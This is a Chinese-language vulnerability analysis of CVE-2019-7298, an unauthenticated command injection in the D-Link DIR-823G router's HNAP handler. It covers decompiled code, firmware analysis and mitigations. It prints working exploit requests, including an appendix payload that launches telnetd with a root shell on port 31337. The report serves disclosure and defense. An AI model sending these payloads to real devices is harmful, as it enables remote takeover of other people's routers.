D-Link DIR-823G CVE-2019-7298 命令注入漏洞分析报告<\/h1>

漏洞概述<\/h2>
漏洞编号<\/strong>: CVE-2019-7298
影响设备<\/strong>: D-Link DIR-823G 路由器
影响版本<\/strong>: 固件版本 1.02B03 及以下
漏洞类型<\/strong>: 远程命令注入
CVSS评分<\/strong>: 9.8 (Critical)
漏洞发现者<\/strong>: 未知（先知社区发布分析）<\/p>

漏洞描述<\/h2>
D-Link DIR-823G 路由器在处理 \/HNAP1<\/code> 请求时存在命令注入漏洞。攻击者可以通过构造恶意的 HNAP API 请求，在未授权的情况下执行任意操作系统命令。该漏洞源于 system()<\/code> 函数执行了未经充分验证的用户输入。<\/p>
技术细节<\/h2> 漏洞触发流程<\/h3> 攻击者向目标设备发送特制的 \/HNAP1<\/code> HTTP POST 请求<\/li> GoAhead Web 服务器将请求路由到 websHNAPHandler<\/code> 处理函数<\/li> 处理函数使用 snprintf<\/code> 构造包含用户输入的 echo<\/code> 命令<\/li> 构造的命令通过 system()<\/code> 函数执行，导致命令注入<\/li> <\/ol> 关键代码分析<\/h3> 漏洞存在于 \/bin\/goahead<\/code> 二进制文件的 sub_42383C<\/code> 函数（即 websHNAPHandler<\/code>）中：<\/p> memset(&<\/span>v11[27<\/span>], 0<\/span>, 5000<\/span>); <\/span><\/span>snprintf(&<\/span>v11[27<\/span>], 4999<\/span>, "echo '%s' >\/var\/hnaplog"<\/span>, a7); <\/span><\/span>system(&<\/span>v11[27<\/span>]); <\/span><\/span><\/code><\/pre>其中 a7<\/code> 参数直接来自用户可控的 POST 数据，未经过任何过滤就被拼接到系统命令中执行。<\/p> 漏洞利用条件<\/h3> 攻击者能够访问目标设备的 Web 接口（通常为 80 端口）<\/li> 目标设备运行受影响固件版本（1.02B03 或更早）<\/li> 不需要任何身份验证<\/li> <\/ol> 漏洞复现<\/h2> 环境准备<\/h3> 受影响设备：D-Link DIR-823G 固件 1.02B03<\/li> 攻击机：任意可发送 HTTP 请求的系统<\/li> 网络环境：攻击机与目标设备在同一网络<\/li> <\/ul> 复现步骤<\/h3> 构造恶意 HTTP 请求：<\/li> <\/ol> POST<\/span> \/HNAP1\/ HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> 192.168.0.1<\/span> <\/span><\/span>Content-Length:<\/span> 37<\/span> <\/span><\/span>User-Agent:<\/span> Mozilla\/5.0<\/span> <\/span><\/span>Content-Type:<\/span> text\/xml; charset=UTF-8<\/span> <\/span><\/span>Accept:<\/span> *\/*<\/span> <\/span><\/span>SOAPAction:<\/span> "http:\/\/purenetworks.com\/HNAP1\/Login"<\/span> <\/span><\/span>Connection:<\/span> close<\/span> <\/span><\/span> <\/span><\/span>'`echo hacked > \/web_mtn\/hacker.txt`' <\/span><\/span><\/code><\/pre> 发送请求到目标设备<\/li> 验证漏洞利用是否成功：检查 \/web_mtn\/hacker.txt<\/code> 文件是否被创建<\/li> 文件内容应为 "hacked"<\/li> <\/ul> <\/li> <\/ol> 利用技巧<\/h3> 命令构造<\/strong>：必须使用单引号闭合原始命令中的引号<\/p> 错误示例：`\/bin\/telnetd`<\/code> → 会被当作字符串处理<\/li> 正确示例：'`\/bin\/telnetd`'<\/code> → 会执行命令<\/li> <\/ul> <\/li> SOAPAction 头<\/strong>：必须包含有效的 SOAPAction，可从固件中提取已知值<\/p> <\/li> 回显技巧<\/strong>：可通过写入Web目录文件或建立反向连接确认命令执行<\/p> <\/li> <\/ol> 深入分析<\/h2> GoAhead Web 服务器机制<\/h3> 漏洞涉及的关键组件是 GoAhead Web 服务器，其 URL 处理机制如下：<\/p> websUrlHandlerDefine(T("\/HNAP1"<\/span>), NULL, 0<\/span>, websHNAPHandler, 0<\/span>); <\/span><\/span>websUrlHandlerDefine(T("\/goform"<\/span>), NULL, 0<\/span>, websFormHandler, 0<\/span>); <\/span><\/span>websUrlHandlerDefine(T("\/cgi-bin"<\/span>), NULL, 0<\/span>, websCgiHandler, 0<\/span>); <\/span><\/span><\/code><\/pre>固件分析过程<\/h3> 使用 binwalk 解包固件：<\/p> binwalk -Me DIR823GA1_FW102B03.bin <\/span><\/span><\/code><\/pre><\/li> 分析启动脚本 \/etc\/rcS<\/code>，发现启动了 GoAhead：<\/p> goahead & <\/span><\/span><\/code><\/pre><\/li> 逆向分析 \/bin\/goahead<\/code> 二进制文件，定位漏洞函数<\/p> <\/li> <\/ol> 漏洞根本原因<\/h3> 不安全函数使用<\/strong>：直接使用 system()<\/code> 执行包含用户输入的字符串<\/li> 缺乏输入验证<\/strong>：未对用户提供的 POST 数据进行过滤<\/li> 错误日志记录方式<\/strong>：通过 shell 命令记录日志而非安全 API<\/li> <\/ol> 修复建议<\/h2> 厂商修复方案<\/strong>：<\/p> 升级到最新固件版本<\/li> 使用安全的日志记录方式（如直接文件写入）<\/li> 实现严格的输入验证<\/li> <\/ul> <\/li> 临时缓解措施<\/strong>：<\/p> 禁用 HNAP 服务（如果不需要）<\/li> 配置防火墙规则限制对 Web 接口的访问<\/li> 启用设备认证机制<\/li> <\/ul> <\/li> <\/ol> 参考链接<\/h2> 先知社区漏洞分析原文<\/li> CVE-2019-7298 官方描述<\/li> D-Link 安全公告<\/li> <\/ol> 附录<\/h2> 完整攻击载荷示例<\/h3> POST<\/span> \/HNAP1\/ HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> 192.168.0.1<\/span> <\/span><\/span>User-Agent:<\/span> Mozilla\/5.0<\/span> <\/span><\/span>Content-Type:<\/span> text\/xml<\/span> <\/span><\/span>SOAPAction:<\/span> "http:\/\/purenetworks.com\/HNAP1\/GetDeviceSettings"<\/span> <\/span><\/span>Content-Length:<\/span> 29<\/span> <\/span><\/span> <\/span><\/span>'`telnetd -l \/bin\/sh -p 31337`' <\/span><\/span><\/code><\/pre>受影响函数表<\/h3> 固件中包含的 HNAP 处理函数（部分）：<\/p> 函数名<\/th> 地址<\/th> 描述<\/th> <\/tr> <\/thead> GetDeviceSettings<\/td> 0x40XXXX<\/td> 设备设置获取<\/td> <\/tr> Login<\/td> 0x40XXXX<\/td> 认证处理<\/td> <\/tr> GetLocalMac<\/td> 0x40XXXX<\/td> MAC地址获取<\/td> <\/tr> <\/tbody> <\/table>

函数名<\/th>	地址<\/th>	描述<\/th> <\/tr> <\/thead>
GetDeviceSettings<\/td>	0x40XXXX<\/td>	设备设置获取<\/td> <\/tr>
Login<\/td>	0x40XXXX<\/td>	认证处理<\/td> <\/tr>
GetLocalMac<\/td>	0x40XXXX<\/td>	MAC地址获取<\/td> <\/tr> <\/tbody> <\/table>